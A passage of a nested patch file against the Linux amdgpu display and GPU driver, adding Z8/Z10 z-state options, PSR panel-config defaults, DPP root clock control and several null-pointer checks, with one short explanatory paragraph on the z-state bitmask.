+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1348,6 +1281,7 @@ static int mes_v11_0_late_init(void *handle)
+ 
+ static const struct amd_ip_funcs mes_v11_0_ip_funcs = {
+ 	.name = "mes_v11_0",
++	.early_init = mes_v11_0_early_init,
+ 	.late_init = mes_v11_0_late_init,
+ 	.sw_init = mes_v11_0_sw_init,
+ 	.sw_fini = mes_v11_0_sw_fini,
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 4d780e4430e78..77d5a6f304094 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -1941,9 +1941,11 @@ static int sdma_v4_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	for (i = 0; i < adev->sdma.num_instances; i++) {
+-		amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
+-			       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__SDMA)) {
++		for (i = 0; i < adev->sdma.num_instances; i++) {
++			amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
++				       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++		}
+ 	}
+ 
+ 	sdma_v4_0_ctx_switch_enable(adev, false);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 9c52af5005253..d150a90daa403 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -715,7 +715,7 @@ static int soc21_common_early_init(void *handle)
+ 			AMD_PG_SUPPORT_VCN_DPG |
+ 			AMD_PG_SUPPORT_GFX_PG |
+ 			AMD_PG_SUPPORT_JPEG;
+-		adev->external_rev_id = adev->rev_id + 0x1;
++		adev->external_rev_id = adev->rev_id + 0x80;
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 99b99f0b42c06..b46732cefe37c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -39,6 +39,7 @@
+ #include "dc/dc_edid_parser.h"
+ #include "dc/dc_stat.h"
+ #include "amdgpu_dm_trace.h"
++#include "dc/inc/dc_link_ddc.h"
+ 
+ #include "vid.h"
+ #include "amdgpu.h"
+@@ -2254,6 +2255,14 @@ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ 		if (suspend) {
+ 			drm_dp_mst_topology_mgr_suspend(mgr);
+ 		} else {
++			/* if extended timeout is supported in hardware,
++			 * default to LTTPR timeout (3.2ms) first as a W/A for DP link layer
++			 * CTS 4.2.1.1 regression introduced by CTS specs requirement update.
++			 */
++			dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_LTTPR_TIMEOUT_PERIOD);
++			if (!dp_is_lttpr_present(aconnector->dc_link))
++				dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_TIMEOUT_PERIOD);
++
+ 			ret = drm_dp_mst_topology_mgr_resume(mgr, true);
+ 			if (ret < 0) {
+ 				dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
+@@ -7584,6 +7593,13 @@ static void amdgpu_dm_commit_cursors(struct drm_atomic_state *state)
+ 			handle_cursor_update(plane, old_plane_state);
+ }
+ 
++static inline uint32_t get_mem_type(struct drm_framebuffer *fb)
++{
++	struct amdgpu_bo *abo = gem_to_amdgpu_bo(fb->obj[0]);
++
++	return abo->tbo.resource ? abo->tbo.resource->mem_type : 0;
++}
++
+ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				    struct dc_state *dc_state,
+ 				    struct drm_device *dev,
+@@ -7657,6 +7673,8 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			continue;
+ 
+ 		dc_plane = dm_new_plane_state->dc_state;
++		if (!dc_plane)
++			continue;
+ 
+ 		bundle->surface_updates[planes_count].surface = dc_plane;
+ 		if (new_pcrtc_state->color_mgmt_changed) {
+@@ -7701,11 +7719,13 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 
+ 		/*
+ 		 * Only allow immediate flips for fast updates that don't
+-		 * change FB pitch, DCC state, rotation or mirroing.
++		 * change memory domain, FB pitch, DCC state, rotation or
++		 * mirroring.
+ 		 */
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+-			acrtc_state->update_type == UPDATE_TYPE_FAST;
++			acrtc_state->update_type == UPDATE_TYPE_FAST &&
++			get_mem_type(old_plane_state->fb) == get_mem_type(fb);
+ 
+ 		timestamp_ns = ktime_get_ns();
+ 		bundle->flip_addrs[planes_count].flip_timestamp_in_us = div_u64(timestamp_ns, 1000);
+@@ -9199,8 +9219,9 @@ static int dm_update_plane_state(struct dc *dc,
+ 			return -EINVAL;
+ 		}
+ 
++		if (dm_old_plane_state->dc_state)
++			dc_plane_state_release(dm_old_plane_state->dc_state);
+ 
+-		dc_plane_state_release(dm_old_plane_state->dc_state);
+ 		dm_new_plane_state->dc_state = NULL;
+ 
+ 		*lock_and_validation_needed = true;
+@@ -9737,6 +9758,7 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
+ 		if (ret) {
+ 			DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
++			ret = -EINVAL;
+ 			goto fail;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index df74bc88e4600..e2f9141d6d938 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -1368,6 +1368,7 @@ int pre_validate_dsc(struct drm_atomic_state *state,
+ 	ret = pre_compute_mst_dsc_configs_for_state(state, local_dc_state, vars);
+ 	if (ret != 0) {
+ 		DRM_INFO_ONCE("pre_compute_mst_dsc_configs_for_state() failed\n");
++		ret = -EINVAL;
+ 		goto clean_exit;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c
+index 090b2c02aee17..0827c7df28557 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c
+@@ -333,8 +333,8 @@ void dcn31_smu_set_zstate_support(struct clk_mgr_internal *clk_mgr, enum dcn_zst
+ 			(support == DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY))
+ 		support = DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-
+-	if (support == DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY)
++	if (support == DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY ||
++	    support == DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY)
+ 		param = 1;
+ 	else
+ 		param = 0;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+index aa264c600408d..0765334f08259 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+@@ -349,8 +349,6 @@ void dcn314_smu_set_zstate_support(struct clk_mgr_internal *clk_mgr, enum dcn_zs
+ 	if (!clk_mgr->smu_present)
+ 		return;
+ 
+-	// Arg[15:0] = 8/9/0 for Z8/Z9/disallow -> existing bits
+-	// Arg[16] = Disallow Z9 -> new bit
+ 	switch (support) {
+ 
+ 	case DCN_ZSTATE_SUPPORT_ALLOW:
+@@ -369,6 +367,16 @@ void dcn314_smu_set_zstate_support(struct clk_mgr_internal *clk_mgr, enum dcn_zs
+ 		param = (1 << 10);
+ 		break;
+ 
++	case DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY:
++		msg_id = VBIOSSMC_MSG_AllowZstatesEntry;
++		param = (1 << 10) | (1 << 8);
++		break;
++
++	case DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY:
++		msg_id = VBIOSSMC_MSG_AllowZstatesEntry;
++		param = (1 << 8);
++		break;
++
+ 	default: //DCN_ZSTATE_SUPPORT_UNKNOWN
+ 		msg_id = VBIOSSMC_MSG_AllowZstatesEntry;
+ 		param = 0;
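Reading the cases together, the AllowZstatesEntry argument is a small bitmask in which bit 10 allows Z10 and bit 8 allows Z8 (inferred from this hunk; the authoritative encoding belongs to the SMU interface):

	ALLOW_Z10_ONLY     ->  (1 << 10)
	ALLOW_Z8_Z10_ONLY  ->  (1 << 10) | (1 << 8)
	ALLOW_Z8_ONLY      ->  (1 << 8)
	UNKNOWN/default    ->  0

The dcn31 variant earlier in this patch takes only a boolean-style param, which is why it maps both ALLOW_Z10_ONLY and ALLOW_Z8_Z10_ONLY to 1.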
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+index 9eb9fe5b8d2c5..1d84a04acb3f0 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+@@ -756,6 +756,8 @@ void dcn32_clk_mgr_construct(
+ 		struct pp_smu_funcs *pp_smu,
+ 		struct dccg *dccg)
+ {
++	struct clk_log_info log_info = {0};
++
+ 	clk_mgr->base.ctx = ctx;
+ 	clk_mgr->base.funcs = &dcn32_funcs;
+ 	if (ASICREV_IS_GC_11_0_2(clk_mgr->base.ctx->asic_id.hw_internal_rev)) {
+@@ -789,6 +791,7 @@ void dcn32_clk_mgr_construct(
+ 			clk_mgr->base.clks.ref_dtbclk_khz = 268750;
+ 	}
+ 
++
+ 	/* integer part is now VCO frequency in kHz */
+ 	clk_mgr->base.dentist_vco_freq_khz = dcn32_get_vco_frequency_from_reg(clk_mgr);
+ 
+@@ -796,6 +799,8 @@ void dcn32_clk_mgr_construct(
+ 	if (clk_mgr->base.dentist_vco_freq_khz == 0)
+ 		clk_mgr->base.dentist_vco_freq_khz = 4300000; /* Updated as per HW docs */
+ 
++	dcn32_dump_clk_registers(&clk_mgr->base.boot_snapshot, &clk_mgr->base, &log_info);
++
+ 	if (ctx->dc->debug.disable_dtb_ref_clk_switch &&
+ 			clk_mgr->base.clks.ref_dtbclk_khz != clk_mgr->base.boot_snapshot.dtbclk) {
+ 		clk_mgr->base.clks.ref_dtbclk_khz = clk_mgr->base.boot_snapshot.dtbclk;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index bf7fcd268cb47..6299130663a3d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -3381,7 +3381,7 @@ bool dc_link_setup_psr(struct dc_link *link,
+ 		case FAMILY_YELLOW_CARP:
+ 		case AMDGPU_FAMILY_GC_10_3_6:
+ 		case AMDGPU_FAMILY_GC_11_0_1:
+-			if (dc->debug.disable_z10)
++			if (dc->debug.disable_z10 || dc->debug.psr_skip_crtc_disable)
+ 				psr_context->psr_level.bits.SKIP_CRTC_DISABLE = true;
+ 			break;
+ 		default:
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index fd8db482e56f9..f0d05829288bd 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -1707,6 +1707,9 @@ bool dc_remove_plane_from_context(
+ 	struct dc_stream_status *stream_status = NULL;
+ 	struct resource_pool *pool = dc->res_pool;
+ 
++	if (!plane_state)
++		return true;
++
+ 	for (i = 0; i < context->stream_count; i++)
+ 		if (context->streams[i] == stream) {
+ 			stream_status = &context->stream_status[i];
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 0598465fd1a1b..3f277009075fd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -491,6 +491,8 @@ enum dcn_pwr_state {
+ enum dcn_zstate_support_state {
+ 	DCN_ZSTATE_SUPPORT_UNKNOWN,
+ 	DCN_ZSTATE_SUPPORT_ALLOW,
++	DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY,
++	DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY,
+ 	DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY,
+ 	DCN_ZSTATE_SUPPORT_DISALLOW,
+ };
+@@ -764,7 +766,6 @@ struct dc_debug_options {
+ 	bool disable_mem_low_power;
+ 	bool pstate_enabled;
+ 	bool disable_dmcu;
+-	bool disable_psr;
+ 	bool force_abm_enable;
+ 	bool disable_stereo_support;
+ 	bool vsr_support;
+@@ -780,6 +781,7 @@ struct dc_debug_options {
+ 	unsigned int force_odm_combine; //bit vector based on otg inst
+ 	unsigned int seamless_boot_odm_combine;
+ 	unsigned int force_odm_combine_4to1; //bit vector based on otg inst
++	int minimum_z8_residency_time;
+ 	bool disable_z9_mpc;
+ 	unsigned int force_fclk_khz;
+ 	bool enable_tri_buf;
+@@ -828,6 +830,7 @@ struct dc_debug_options {
+ 	int crb_alloc_policy_min_disp_count;
+ 	bool disable_z10;
+ 	bool enable_z9_disable_interface;
++	bool psr_skip_crtc_disable;
+ 	union dpia_debug_options dpia_debug;
+ 	bool disable_fixed_vs_aux_timeout_wa;
+ 	bool force_disable_subvp;
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_link.h b/drivers/gpu/drm/amd/display/dc/dc_link.h
+index caf0c7af2d0b9..17f080f8af6cd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_link.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_link.h
+@@ -117,7 +117,7 @@ struct psr_settings {
+  * Add a struct dc_panel_config under dc_link
+  */
+ struct dc_panel_config {
+-	// extra panel power sequence parameters
++	/* extra panel power sequence parameters */
+ 	struct pps {
+ 		unsigned int extra_t3_ms;
+ 		unsigned int extra_t7_ms;
+@@ -127,13 +127,21 @@ struct dc_panel_config {
+ 		unsigned int extra_t12_ms;
+ 		unsigned int extra_post_OUI_ms;
+ 	} pps;
+-	// ABM
++	/* PSR */
++	struct psr {
++		bool disable_psr;
++		bool disallow_psrsu;
++		bool rc_disable;
++		bool rc_allow_static_screen;
++		bool rc_allow_fullscreen_VPB;
++	} psr;
++	/* ABM */
+ 	struct varib {
+ 		unsigned int varibright_feature_enable;
+ 		unsigned int def_varibright_level;
+ 		unsigned int abm_config_setting;
+ 	} varib;
+-	// edp DSC
++	/* edp DSC */
+ 	struct dsc {
+ 		bool disable_dsc_edp;
+ 		unsigned int force_dsc_edp_policy;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 55d63d860ef10..0dcd9fea122d0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -726,11 +726,15 @@ void dcn10_hubp_pg_control(
+ 	}
+ }
+ 
+-static void power_on_plane(
++static void power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	int plane_id)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, plane_id, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1237,11 +1241,15 @@ void dcn10_plane_atomic_power_down(struct dc *dc,
+ 			hws->funcs.hubp_pg_control(hws, hubp->inst, false);
+ 
+ 		dpp->funcs->dpp_reset(dpp);
++
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 0);
+ 		DC_LOG_DEBUG(
+ 				"Power gated front end %d\n", hubp->inst);
+ 	}
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, dpp->inst, false);
+ }
+ 
+ /* disable HW used by plane.
+@@ -2450,7 +2458,7 @@ static void dcn10_enable_plane(
+ 
+ 	undo_DEGVIDCN10_253_wa(dc);
+ 
+-	power_on_plane(dc->hwseq,
++	power_on_plane_resources(dc->hwseq,
+ 		pipe_ctx->plane_res.hubp->inst);
+ 
+ 	/* enable DCFCLK current DCHUB */
+@@ -3369,7 +3377,9 @@ static bool dcn10_can_pipe_disable_cursor(struct pipe_ctx *pipe_ctx)
+ 	for (test_pipe = pipe_ctx->top_pipe; test_pipe;
+ 	     test_pipe = test_pipe->top_pipe) {
+ 		// Skip invisible layer and pipe-split plane on same layer
+-		if (!test_pipe->plane_state->visible || test_pipe->plane_state->layer_index == cur_layer)
++		if (!test_pipe->plane_state ||
++		    !test_pipe->plane_state->visible ||
++		    test_pipe->plane_state->layer_index == cur_layer)
+ 			continue;
+ 
+ 		r2 = test_pipe->plane_res.scl_data.recout;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index f348bc15a9256..2d49e99a152c4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1087,11 +1087,15 @@ void dcn20_blank_pixel_data(
+ }
+ 
+ 
+-static void dcn20_power_on_plane(
++static void dcn20_power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	struct pipe_ctx *pipe_ctx)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, pipe_ctx->plane_res.dpp->inst, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1115,7 +1119,7 @@ static void dcn20_enable_plane(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	//if (dc->debug.sanity_checks) {
+ 	//	dcn10_verify_allow_pstate_change_high(dc);
+ 	//}
+-	dcn20_power_on_plane(dc->hwseq, pipe_ctx);
++	dcn20_power_on_plane_resources(dc->hwseq, pipe_ctx);
+ 
+ 	/* enable DCFCLK current DCHUB */
+ 	pipe_ctx->plane_res.hubp->funcs->hubp_clk_cntl(pipe_ctx->plane_res.hubp, true);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c b/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c
+index 887081472c0d8..ce6c70e25703d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c
+@@ -671,12 +671,15 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 		.disable_pplib_wm_range = true,
+ 		.disable_stutter = true,
+ 		.disable_48mhz_pwrdwn = true,
+-		.disable_psr = true,
+ 		.enable_tri_buf = true,
+ 		.use_max_lb = true
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++		.psr = {
++			.disable_psr = false,
++			.disallow_psrsu = false,
++		},
+ 		.ilr = {
+ 			.optimize_edp_link_rate = true,
+ 		},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+index e958f838c8041..5a8d1a0513149 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+@@ -723,7 +723,6 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.underflow_assert_delay_us = 0xFFFFFFFF,
+ 	.dwb_fi_phase = -1, // -1 = disable,
+ 	.dmub_command_table = true,
+-	.disable_psr = false,
+ 	.use_max_lb = true,
+ 	.exit_idle_opt_for_cursor_updates = true
+ };
+@@ -742,11 +741,17 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 	.scl_reset_length10 = true,
+ 	.dwb_fi_phase = -1, // -1 = disable
+ 	.dmub_command_table = true,
+-	.disable_psr = true,
+ 	.enable_tri_buf = true,
+ 	.use_max_lb = true
+ };
+ 
++static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
++};
++
+ static void dcn30_dpp_destroy(struct dpp **dpp)
+ {
+ 	kfree(TO_DCN20_DPP(*dpp));
+@@ -2214,6 +2219,11 @@ void dcn30_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params
+ 	}
+ }
+ 
++static void dcn30_get_panel_config_defaults(struct dc_panel_config *panel_config)
++{
++	*panel_config = panel_config_defaults;
++}
++
+ static const struct resource_funcs dcn30_res_pool_funcs = {
+ 	.destroy = dcn30_destroy_resource_pool,
+ 	.link_enc_create = dcn30_link_encoder_create,
+@@ -2233,6 +2243,7 @@ static const struct resource_funcs dcn30_res_pool_funcs = {
+ 	.release_post_bldn_3dlut = dcn30_release_post_bldn_3dlut,
+ 	.update_bw_bounding_box = dcn30_update_bw_bounding_box,
+ 	.patch_unknown_plane_state = dcn20_patch_unknown_plane_state,
++	.get_panel_config_defaults = dcn30_get_panel_config_defaults,
+ };
+ 
+ #define CTX ctx
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c b/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c
+index b925b6ddde5a3..d3945876aceda 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c
+@@ -112,10 +112,16 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 		.dwb_fi_phase = -1, // -1 = disable
+ 		.dmub_command_table = true,
+ 		.enable_tri_buf = true,
+-		.disable_psr = true,
+ 		.use_max_lb = true
+ };
+ 
++static const struct dc_panel_config panel_config_defaults = {
++		.psr = {
++			.disable_psr = false,
++			.disallow_psrsu = false,
++		},
++};
++
+ enum dcn302_clk_src_array_id {
+ 	DCN302_CLK_SRC_PLL0,
+ 	DCN302_CLK_SRC_PLL1,
+@@ -1132,6 +1138,11 @@ void dcn302_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_param
+ 	DC_FP_END();
+ }
+ 
++static void dcn302_get_panel_config_defaults(struct dc_panel_config *panel_config)
++{
++	*panel_config = panel_config_defaults;
++}
++
+ static struct resource_funcs dcn302_res_pool_funcs = {
+ 		.destroy = dcn302_destroy_resource_pool,
+ 		.link_enc_create = dcn302_link_encoder_create,
+@@ -1151,6 +1162,7 @@ static struct resource_funcs dcn302_res_pool_funcs = {
+ 		.release_post_bldn_3dlut = dcn30_release_post_bldn_3dlut,
+ 		.update_bw_bounding_box = dcn302_update_bw_bounding_box,
+ 		.patch_unknown_plane_state = dcn20_patch_unknown_plane_state,
++		.get_panel_config_defaults = dcn302_get_panel_config_defaults,
+ };
+ 
+ static struct dc_cap_funcs cap_funcs = {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+index 527d5c9028785..7e7f18bef0986 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+@@ -96,7 +96,13 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 		.dwb_fi_phase = -1, // -1 = disable
+ 		.dmub_command_table = true,
+ 		.enable_tri_buf = true,
+-		.disable_psr = true,
++};
++
++static const struct dc_panel_config panel_config_defaults = {
++		.psr = {
++			.disable_psr = false,
++			.disallow_psrsu = false,
++		},
+ };
+ 
+ enum dcn303_clk_src_array_id {
+@@ -1055,6 +1061,10 @@ static void dcn303_destroy_resource_pool(struct resource_pool **pool)
+ 	*pool = NULL;
+ }
+ 
++static void dcn303_get_panel_config_defaults(struct dc_panel_config *panel_config)
++{
++	*panel_config = panel_config_defaults;
++}
+ 
+ void dcn303_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params)
+ {
+@@ -1082,6 +1092,7 @@ static struct resource_funcs dcn303_res_pool_funcs = {
+ 		.release_post_bldn_3dlut = dcn30_release_post_bldn_3dlut,
+ 		.update_bw_bounding_box = dcn303_update_bw_bounding_box,
+ 		.patch_unknown_plane_state = dcn20_patch_unknown_plane_state,
++		.get_panel_config_defaults = dcn303_get_panel_config_defaults,
+ };
+ 
+ static struct dc_cap_funcs cap_funcs = {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index 7f34418e63081..7d2b982506fd7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -66,17 +66,8 @@ void dccg31_update_dpp_dto(struct dccg *dccg, int dpp_inst, int req_dppclk)
+ 		REG_UPDATE(DPPCLK_DTO_CTRL,
+ 				DPPCLK_DTO_ENABLE[dpp_inst], 1);
+ 	} else {
+-		//DTO must be enabled to generate a 0Hz clock output
+-		if (dccg->ctx->dc->debug.root_clock_optimization.bits.dpp) {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 1);
+-			REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
+-					DPPCLK0_DTO_PHASE, 0,
+-					DPPCLK0_DTO_MODULO, 1);
+-		} else {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 0);
+-		}
++		REG_UPDATE(DPPCLK_DTO_CTRL,
++				DPPCLK_DTO_ENABLE[dpp_inst], 0);
+ 	}
+ 	dccg->pipe_dppclk_khz[dpp_inst] = req_dppclk;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+index d825f11b4feaa..d3f76512841b4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+@@ -911,6 +911,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+index 389a8938ee451..85ea3334355c2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+@@ -289,8 +289,31 @@ static void dccg314_set_valid_pixel_rate(
+ 	dccg314_set_dtbclk_dto(dccg, &dto_params);
+ }
+ 
++static void dccg314_dpp_root_clock_control(
++		struct dccg *dccg,
++		unsigned int dpp_inst,
++		bool clock_on)
++{
++	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
++
++	if (clock_on) {
++		/* turn off the DTO and leave phase/modulo at max */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 0);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0xFF,
++			  DPPCLK0_DTO_MODULO, 0xFF);
++	} else {
++		/* turn on the DTO to generate a 0hz clock */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 1);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0,
++			  DPPCLK0_DTO_MODULO, 1);
++	}
++}
++
+ static const struct dccg_funcs dccg314_funcs = {
+ 	.update_dpp_dto = dccg31_update_dpp_dto,
++	.dpp_root_clock_control = dccg314_dpp_root_clock_control,
+ 	.get_dccg_ref_freq = dccg31_get_dccg_ref_freq,
+ 	.dccg_init = dccg31_init,
+ 	.set_dpstreamclk = dccg314_set_dpstreamclk,
